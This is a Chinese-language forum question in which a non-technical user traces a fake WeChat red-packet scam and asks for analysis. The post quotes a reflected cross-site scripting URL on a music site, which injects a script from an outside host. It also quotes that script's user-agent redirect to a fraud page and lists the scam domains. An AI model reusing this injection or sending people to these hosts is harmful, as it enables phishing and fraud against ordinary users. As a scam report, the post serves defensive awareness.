V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Jasmine2016
V2EX  ›  问与答

有没有大神来分析分析这个微信(假)红包骗术?

  •  
  •   Jasmine2016 · 2017-04-12 16:38:03 +08:00 · 1266 次点击
    这是一个创建于 2587 天前的主题,其中的信息可能已经有所发展或是发生改变。

    前排提示:其实只有最后面给的那个网址有用,中间都是过渡,讲故事用的。想搞事情的可以直接搞最后面的。


    下午看到有人发了个「小黄车全民惊喜袭来,我刚刚拿到了¥ xxx !」,感觉有点像诈骗类的链接,点进去一看,没啥问题,而且红包跳出的方式跟微信的一样。但是选择用浏览器打开时,网址就暴露了。网址如下: http://my.yue365.com/search/index.shtml?KeyWords=%3Cscript%20src%3D%27http%3A%2F%2Fttqwe.applinzi.com%2Fj.php%27%3E%3C%2Fscript%3E&type=song&skt=58451491983841

    然后又接着访问这个网址: http://ttqwe.applinzi.com/j.php

    然后整个网页出来了一句这个:

    var ua = navigator.userAgent;if(ua.indexOf("MicroMessenger")>0){window.location.href = "http://erng1191906168168v2g.chinacloudsites.cn/";}
    

    接着我又打开了这个网址: http://erng1191906168168v2g.chinacloudsites.cn/

    上面这个网址其实就是真正的诈骗网站了。

    源代码里有这么个网站: http://ceshice123.chinacloudapp.cn/gift/v2/jssdk/azure/index.js

    貌似是让我先分享给三个群,然后再分享到朋友圈,集满三个赞, 4 月 20 日钱就到账了。。。感觉到时候可能要套用户的个人隐私或者骗钱? 由于我不是 IT 人员,看不懂上面写的啥,有没有人给分析分析?

    目前尚无回复
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   912 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 20:27 · PVG 04:27 · LAX 13:27 · JFK 16:27
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.